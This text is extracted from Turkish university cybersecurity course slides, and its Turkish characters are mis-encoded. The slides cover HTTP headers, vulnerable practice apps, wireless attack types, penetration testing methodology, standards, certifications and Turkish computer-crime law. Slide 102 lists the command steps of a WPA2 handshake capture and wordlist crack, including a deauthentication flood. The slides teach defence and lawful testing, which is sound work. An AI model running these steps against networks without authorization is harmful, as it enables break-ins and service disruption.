  • 86. Http Header Bilgileri Request Cf-Connecting-Ip Cookie Accept-Language Referer Accept User-Agent Upgrade-Insecure-Requests Cf-Visitor X-Forwarded-Proto Cf-Ray X-Forwarded-For Cf-Ipcountry Accept-Encoding Connection Host Response Content-Base Content-Length Cache-Control Content-Type Date eTag Last-Modified Location Server Set-Cookie X-Powered-By WWW-Authenticate Connection Bir web sitesinin header bilgilerini g旦rmek i巽in; https://headers.cloxy.net/ adresinden yararlan脹labilir.
  • 88. Sunucu Teknolojileri Scripting dilleri (PHP, VBScript, Perl) Web uygulama platformlar脹 (ASP.NET, Java) Web sunucular脹 (Apache, IIS, ngix) Veritabanlar脹 (MS-SQL, Oracle, MySQL) ve dier destekleyici servislerdir (File Systems, SOAP tabanl脹 web servisleri, dizin servisleri) 聴stemci g旦nderileri URL sorgu stringleri HTTP cookieleri POST metodu ile yap脹lan istek mesaj g旦vdeleri
  • 89. Web Lab Uygulama Yaz脹l脹mlar脹 DVWA Mutillidae SQLol Hackxor The BodgeIt Store Exploit KB / exploit.co.il Vulnerable Web App WackoPicko WebGoat OWASP Hackademic Challenges Project XSSeducation
  • 90. Damn Vulnerable Web App (DVWA) Web uygulama g端venlii alan脹nda kendini gelitirmek isteyenler i巽in PHP ile oluturulmu i巽inde belli web zafiyetlerini bar脹nd脹ran bir eitim sistemidir. Bar脹nd脹rd脹脹 Zafiyetler: Brute Force Command Execution CSRF File Inclusion SQL Injection Upload XSS Reflected XSS Stored
  • 91. DVWS Uygulamalar脹 Sanal makine Metasploitable2 Firefox taray脹c脹s脹
  • 93. Kablosuz A G端venlii Open Security WEP WPA RSN RADIUS / WPA-RADIUS Wireless Gateway Firmalara 旦zel 巽旦z端mler
  • 95. Kablosuz A Sald脹r脹 eitleri (IEEE 802.11x Tehditleri) Eriim Kontrol端 Sald脹r脹lar脹 (Access Control Attacks) Gizlilik Sald脹r脹lar脹 (Confidentiality Attacks) B端t端nl端k Dorulama Sald脹r脹lar脹(Integrity Attacks) Kimlik Dorulama Sald脹r脹lar脹 (Authentication Attacks) Kullan脹labilirlik sald脹r脹lar脹 (Availability Attacks)
  • 96. Eriim Kontrol端 Sald脹r脹lar脹 (Access Control Attacks) Kablosuz Alar脹 Tarama (War Driving) Yetkisiz Eriim Noktas脹 (Rogue Access Point) Mac Adres Sahtecilii (Mac Spoofing) Ip Adresi Yan脹ltma (Ip Spoofing) G端venli Olmayan Aa Balanma (Adhoc Associations) 802.1x Radius Cracking
  • 97. Gizlilik Sald脹r脹lar脹 (Confidentiality Attacks) Gizli Dinleme (Eavesdropping) Wep Anahtar脹 K脹rma (Wep Key Cracking) Ap zerinde Sahte Portal al脹t脹rmak (Ap Phishing) Ortadaki Adam Sald脹r脹s脹 (Man In The Middle)
  • 98. B端t端nl端k Dorulama Sald脹r脹lar脹 (Integrity Attacks) 802.11 Paketi P端sk端rtme (Frame Injection) 802.11 Veri Tekrarlama (802.11 Data Replay) 802.1x EAP Tekrarlama (802.1x EAP Replay) 802.1x Radius Tekrarlama (802.1x Radius Replay)
  • 99. Kimlik Dorulama Sald脹r脹lar脹 (Authentication Attacks) Shared Key Guessing PSK Cracking 802.1x Password Guessing Application Login Theft Domain Login Cracking 802.1x LEAP Cracking 802.1x EAP Downgrade
  • 100. Kullan脹labilirlik Sald脹r脹lar脹 (Availability Attacks) Servis Reddi Sald脹r脹lar脹 (DoS Attacks) AP Theft Queensland DoS 802.11 Beacon Flood 802.11 Deauthenticate Flood
  • 101. Sald脹r脹 Ara巽lar脹 airmon-ng airodump-ng aireplay-ng aircrack-ng reaver Netstumbler / MiniStumbler Kismet Airodump Aircrack
  • 102. Sald脹r脹 Y旦ntemi airmon-ng start wlan0 wifi monitor mod airodump-ng wlan0mon 巽evredeki alar bilgi airodump-ng wlan0mon BSSID ile paket toplar aireplay-ng deauth 100 -e Test wlan0mon istemciyi yeniden balanmaya zorlama (el s脹k脹ma) aircrack-ng WPA2-01.cap -w /wordlist/liste.txt o paketlere kaba kuvvet sald脹r脹s脹 ile parola bulma.
  • 108. Savunma Kablosuz a eriim noktalar脹n脹n yama ve firmware g端ncellemesinin yap脹lmas脹 WPA/WPA2 ile g端巽l端 parola ilkesi uygulanmal脹 M端mk端nse trafik VPN ile t端nelleyerek ifrelenmeli M端mk端nse Mac filter kullan脹lmal脹
  • 110. S脹zma Testi Penetration Test PenTest S脹zma Testi Yaz脹l脹m G端venlik Testi Siber G端venlik Tatbikat脹 Siber Tatbikat gibi isimlerle de an脹lmaktad脹r.
  • 111. S脹zma Testi G端venlik uzmanlar脹 taraf脹ndan ger巽ekletirilen, k旦t端 ama巽l脹 bir sald脹rgan脹n sisteme verebilecei zararlar脹 raporlamak ve 旦nceden savunma 旦nlemleri almak amac脹 ile oluturulan sald脹r脹 denemelerinin tamam脹d脹r. (Burlu, 2010) S脹zma testlerinin amac脹, kurululara sistemlerini daha g端venli hale getirmelerinde yard脹mc脹 olmakt脹r.
  • 112. S脹zma Testleri Beyaz apkal脹 hacker, Etik hacker, Pentester, S脹zma Testi Uzman脹, gibi isimler ad脹 alt脹nda ifade edilen siber g端venlik uzmanlar脹 taraf脹ndan ger巽ekletirilmektedir. Uzmanlar belirli kalite standartlar脹na g旦re 巽al脹maktad脹rlar.
  • 113. S脹zma Testi = Zafiyet Analizi mi? S脹zma Testi Zafiyet Analizi Ayn脹 ey deildir. S脹zma testi, yaz脹l脹m ve y旦ntemler kullanarak hedef sistemlere s脹zma giriimleridir. Zafiyet Analizi, otomatize ara巽lar kullanarak sistem g端venliinin teknik a巽脹dan incelenmesi ve raporlanmas脹d脹r.
  • 114. Zafiyetten > S脹zma Testine Belirlenen biliim sistemlerindeki mant脹k hatalar脹 ve zafiyetleri tespit ederek, s旦z konusu g端venlik a巽脹kl脹klar脹n脹n k旦t端 niyetli kiiler taraf脹ndan istismar edilmesini 旦nlemek ve sistemleri daha g端venli hale getirmek maksad脹yla, yetkili kiiler taraf脹ndan ve yasal olarak ger巽ekletirilen g端venlik testleridir. Pentest 巽al脹malar脹ndaki as脹l ama巽, zafiyeti tespit etmekten 旦te ilgili zafiyeti sisteme zarar vermeyecek ekilde istismar etmek ve yetkili eriimler elde etmektir.
  • 115. S脹zma Testi Y旦ntemleri Hedefe yap脹lacak testin t端r端 uzmana verilecek yetki ve bilgiye g旦re deiiklik g旦stermektedir. Beyaz Kutu S脹zma Testleri (White Box) Siyah Kutu S脹zma Testleri (Black Box) Gri Kutu S脹zma Testleri (Gray Box) eklinde 端巽 gruba ay脹rmak m端mk端nd端r.
  • 116. Beyaz Kutu G端venlik testi ekibi, sistemin kendisi ve arka planda 巽al脹an ilave teknolojiler hakk脹nda tam bilgi sahibidir. Test yap脹lan Firmaya daha b端y端k fayda salar. Hata ve zafiyetleri bulmak kolaylaaca脹ndan bunlara tedbir al脹nma s端resi de azalacakt脹r. Sistemin zarar g旦rme riski 巽ok azd脹r ve maliyet olarak da en az maliyetli oland脹r.
  • 117. Siyah Kutu Balang脹巽ta g端venlik testi yap脹lacak sistemle ilgili bir bilgi yoktur. Tamamen bilinmeyen bir sistem ile ilgili bilgi toplanacak ve testler yap脹lacakt脹r. Bu y旦ntemde test ekibinin sistem ile ilgili bilgi d端zeyi hi巽 olmad脹脹ndan, yanl脹l脹kla sisteme zarar verme ihtimalleri de y端ksektir. Bilgi toplama safhas脹 olduk巽a zaman al脹r. S端re bak脹m脹ndan en uzun s端ren yakla脹m tarz脹d脹r.
  • 118. Gri Kutu Sistem ile ilgili bilgiler mevcuttur. rnein; IP adres listesi, sunucu sistem ile ilgili versiyon bilgisi vb. Bilgiler g端venlik testi yapacak ekibe 旦nceden salan脹r. Black Box yakla脹m脹na g旦re daha k脹sa zaman al脹r. Kontrol端 ve testi istenen IP adresleri belli olduundan sistemin, istem d脹脹 zarar g旦rme ihtimali de azalm脹 olur.
  • 119. Metodoloji nceden belirlenmi ve denenmi, kal脹plam脹 standartlar haline gelmi kural ve y旦ntemler. OWASP (Open Web Application Project) OSSTIMM (The Open Source Sec脹rity Testing Methodology Manual) ISSAF (Information Systems Security Assessment Framework) NIST (SP800-15)
  • 120. S脹zma Testi Metodolojisi Bilgi toplama A Haritalama Zay脹fl脹k Tarama Sisteme S脹zma Yetki Y端kseltme Baka Alara S脹zma Eriimleri Koruma 聴zleri Temizleme Raporlama Resim Kayna脹 : CRYPTTECH Kapsam Belirleme, Bilgi Toplama, Keif ve Tarama, Zafiyet Taramas脹 ve Analizi, 聴stismar Etme, Yetki Y端kseltme, Yay脹lma, Bilgi-Dok端man Toplama, 聴zleri Temizleme, Raporlama
  • 121. S脹zma Testi eitleri 聴巽 A D脹 A Web Kablosuz Mobil Sosyal M端hendislik Dos/DDoS Resim Kayna脹: CRYPTTECH
  • 122. Pentest Rapor rnekleri 1. https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf 2. https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report- 33343 3. http://www.niiconsulting.com/services/security-assessment/NII_Sample_PT_Report.pdf
  • 123. Standartlar脹 Oluturan Kurulular IEEE ICANN ISO/IEC ETSI IETF NIST PCI SSC TSE
  • 124. Standartlar ISO 27001:2013 Bilgi G端venlii Y旦netim Sistemi CC COBIT COSO ITIL CMMI TSE
  • 125. ISO 27001 Varl脹klar脹n s脹n脹鍖and脹r脹lmas脹, Gizlilik, b端t端nl端k ve eriebilirlik kriterlerine g旦re varl脹klar脹n deerlendirilmesi, Risk analizi yap脹lmas脹, Risk analizi 巽脹kt脹lar脹na g旦re uygulanacak kontrollerin belirlenmesi, Dok端mantasyon oluturulmas脹, Kontrollerin uygulanmas脹, 聴巽 tetkik, Kay脹tlar脹n tutulmas脹, Y旦netimin g旦zden ge巽irmesi, Belgelendirme eklindedir.
  • 126. Sertifikalar CompTIA Security+ CEH (Certified Ethical Hacker) LPT (Licensed Penetration Tester) OSCP (Offensive Security Certified Professional) CCSP (Cisco Certified Security) CISSP (Certified Information Systems Security Professional) CPTE (Certified Penetration Testing Engineer) ECSA (EC-Council Certified Security Analyst) GIAC (GPEN, GWAPT, GXPN) CEPT (Certified Expert Penetration Tester)
  • 127. Windows Pentest Box Windows ile Pentest ara巽lar脹 https://pentestbox.org
  • 128. S聴BER GVENL聴聴N HUKUK聴 BOYUTU VE B聴L聴聴M HUKUKU 14. Hafta
  • 129. Biliim Hukuku Say脹sal bilginin payla脹m脹n脹 konu alan hukuk dal脹d脹r. 聴nternetin kullan脹m脹na ilikin yasal 巽er巽eveyi belirleyen internet hukukunu kapsamaktad脹r. Youn olarak Ceza hukuku, Genel hukuk ve Fikir Sanat Eserler Kanunun Hukuk kurallar脹 a巽脹s脹ndan ele al脹n脹r. https://www.tbb.org.tr/Content/Upload/Dokuman/801/BILISIM_HUKUKU.pdf
  • 130. Biliim Su巽lar脹 Yetkisiz ve izinsiz eriim (Hacking) Verilere Y旦nelik Su巽lar Biliim Alar脹na Y旦nelik Su巽lar Sanal Tecav端z Biliim Ortam脹nda Cinayet Tehdit ve antaj Hakaret ve s旦vme Taciz ve Sabotaj Doland脹r脹c脹l脹k H脹rs脹zl脹k Sahtekarl脹k Manip端lasyon Pornografi R旦ntgencilik Siber Ter旦rizm Siber Propaganda
  • 131. Biliim 聴le 聴lgili Kanunlar T端rk Ceza Kanunu (Biliim Su巽lar脹) (5237) T端rk Ceza Kanunu (Biliim Vas脹tal脹 Su巽lar) Fikir ve Sanat Eserleri Kanunu (FSEK-5846) (71,72,73) Ceza Muhakemesi Kanunu (5271-Madde 134) Ka巽ak巽脹l脹kla M端cadele Kanunu (4926 - Madde 12) 5651 Say脹l脹 Kanun (聴nternet Ortam脹nda Yap脹lan Yay脹nlar脹n D端zenlenmesi ve Bu Yay脹nlar Yoluyla 聴lenen Su巽larla M端cadele Edilmesi Hakk脹nda Kanun) 5809 Say脹l脹 Elektronik Haberleme Kanunu 5070 Say脹l脹 Elektronik 聴mza Kanunu
  • 132. 5237 say脹l脹 T端rk Ceza Kanununun Biliim Su巽lar脹na 聴likin H端k端mleri Madde 243 Madde 244 Madde 245 Madde 124 Madde 132 Madde 133 Madde 134 Madde 135 Madde 136 Madde 137 Madde 138 Madde 140 Madde 142 Madde 158
  • 133. 5237 say脹l脹 T端rk Ceza Kanununun Biliim Su巽lar脹na 聴likin H端k端mleri Madde 243: Biliim Sistemine Girme Madde 244: Sistemi Engelleme, Bozma, Verileri Yok Etme veya Deitirme Madde 245: (5377 Say脹l脹 Kanunun 27. Maddesiyle Deiik): Sahte Banka Veya Kredi Kart脹 retimi ve Kullan脹m脹 Madde 246: T端zel kiiler hakk脹ndaki tedbirler
  • 134. 5237 say脹l脹 T端rk Ceza Kanununun Biliim Vas脹tal脹 Su巽lar脹na 聴likin H端k端mleri Madde 124: Haberlemenin Engellenmesi Madde 132: Haberlemenin Gizliliini 聴hlal Madde 133: Kiiler Aras脹ndaki Konumalar脹n Dinlenmesi ve Kayda Al脹nmas脹 Madde 134: zel Hayat脹n Gizliliini 聴hlal Madde 135: Kiisel Verilerin Kaydedilmesi Madde 136: Verileri Hukuka Ayk脹r脹 Olarak Verme veya Ele Ge巽irme Madde 137: Nitelikli Haller Madde 138: Verileri Yok Etmeme Madde 140: T端zel Kiiler Hakk脹nda G端venlik Tedbiri Uygulanmas脹 Madde 142: Nitelikli H脹rs脹zl脹k Madde 158: Nitelikli Doland脹r脹c脹l脹k Madde 226: M端stehcenlik
  • 135. Fikir ve Sanat Eserleri Kanunu (5846) Madde 71 Manevi Haklara Tecav端z. Yaz脹l脹m脹 kamuya sunma hakk脹,Yaz脹l脹m sahibinin ad脹n脹 belitme hakk脹, Deiiklik yap脹lmamas脹 hakk脹 Madde 72 Mali Haklara Tecav端z. Deitirmek, kopyalamak, 巽oaltmak yaymak, ticaret konusu yapmak, arac脹l脹k etmek, su巽tur. Madde 73 Dier Su巽lar
  • 136. Ceza Muhakemesi Kanunu (5271) Madde 134 Bilgisayarlarda, bilgisayar programlar脹nda ve k端t端klerinde arama, kopyalama ve elkoyma. (1) Bir su巽 dolay脹s脹yla yap脹lan soruturmada, baka surette delil elde etme imk但n脹n脹n bulunmamas脹 halinde, Cumhuriyet savc脹s脹n脹n istemi 端zerine 端phelinin kulland脹脹 bilgisayar ve bilgisayar programlar脹 ile bilgisayar k端t端klerinde arama yap脹lmas脹na, bilgisayar kay脹tlar脹ndan kopya 巽脹kar脹lmas脹na, bu kay脹tlar脹n 巽旦z端lerek metin h但line getirilmesine h但kim taraf脹ndan karar verilir. (2) Bilgisayar, bilgisayar programlar脹 ve bilgisayar k端t端klerine ifrenin 巽旦z端lememesinden dolay脹 girilememesi veya gizlenmi bilgilere ula脹lamamas脹 halinde 巽旦z端m端n yap脹labilmesi ve gerekli kopyalar脹n al脹nabilmesi i巽in, bu ara巽 ve gere巽lere elkonulabilir. ifrenin 巽旦z端m端n端n yap脹lmas脹 ve gerekli kopyalar脹n al脹nmas脹 halinde, elkonulan cihazlar gecikme olmaks脹z脹n iade edilir. (3) Bilgisayar veya bilgisayar k端t端klerine elkoyma ilemi s脹ras脹nda, sistemdeki b端t端n verilerin yedeklemesi yap脹l脹r. (4) 聴stemesi halinde, bu yedekten bir kopya 巽脹kar脹larak 端pheliye veya vekiline verilir ve bu husus tutanaa ge巽irilerek imza alt脹na al脹n脹r. (5) Bilgisayar veya bilgisayar k端t端klerine elkoymaks脹z脹n da, sistemdeki verilerin tamam脹n脹n veya bir k脹sm脹n脹n kopyas脹 al脹nabilir. Kopyas脹 al脹nan veriler k但脹da yazd脹r脹larak, bu husus tutanaa kaydedilir ve ilgililer taraf脹ndan imza alt脹na al脹n脹r
  • 137. Ka巽ak巽脹l脹kla M端cadele Kanunu (4926) Madde 12 G端mr端k idarelerinde sahte beyan ve belge. G端mr端k idarelerinde ilem g旦rmedii halde ilem g旦rm端 gibi herhangi bir belge veya beyanname d端zenleyenler veya bu su巽lar脹 biliim yoluyla ileyenler hakk脹nda T端rk Ceza Kanununun evrakta sahtekarl脹k ve biliim alan脹ndaki su巽larla ilgili h端k端mlerinde belirtilen cezalar bir kat art脹r脹larak uygulan脹r.
  • 138. T端rk Ceza Kanunu (243) T端rk Ceza Kanunu Madde 243 (Biliim sistemine girme) (1) Bir biliim sisteminin b端t端n端ne veya bir k脹sm脹na, hukuka ayk脹r脹 olarak giren ve orada kalmaya devam eden kimseye bir y脹la kadar hapis veya adl樽 para cezas脹 verilir. (2) Yukar脹daki f脹krada tan脹mlanan fiillerin bedeli kar脹l脹脹 yararlan脹labilen sistemler hakk脹nda ilenmesi h但linde, verilecek ceza yar脹 oran脹na kadar indirilir. (3) Bu fiil nedeniyle sistemin i巽erdii veriler yok olur veya deiirse, alt脹 aydan iki y脹la kadar hapis cezas脹na h端kmolunur.
  • 139. T端rk Ceza Kanunu (244) T端rk Ceza Kanunu Madde 244 (Sistemi engelleme, bozma, verileri yok etme veya deitirme) (1) Bir biliim sisteminin ileyiini engelleyen veya bozan kii, bir y脹ldan be y脹la kadar hapis cezas脹 ile cezaland脹r脹l脹r. (2) Bir biliim sistemindeki verileri bozan, yok eden, deitiren veya eriilmez k脹lan, sisteme veri yerletiren, var olan verileri baka bir yere g旦nderen kii, alt脹 aydan 端巽 y脹la kadar hapis cezas脹 ile cezaland脹r脹l脹r. (3) Bu fiillerin bir banka veya kredi kurumuna ya da bir kamu kurum veya kuruluuna ait biliim sistemi 端zerinde ilenmesi halinde, verilecek ceza yar脹 oran脹nda art脹r脹l脹r. (4) Yukar脹daki f脹kralarda tan脹mlanan fiillerin ilenmesi suretiyle kiinin kendisinin veya bakas脹n脹n yarar脹na haks脹z bir 巽脹kar salamas脹n脹n baka bir su巽 oluturmamas脹 h但linde, iki y脹ldan alt脹 y脹la kadar hapis ve bebin g端ne kadar adl樽 para cezas脹na h端kmolunur.
  • 140. GENEL TEKRAR VE F聴NALE HAZIRLIK 15. Hafta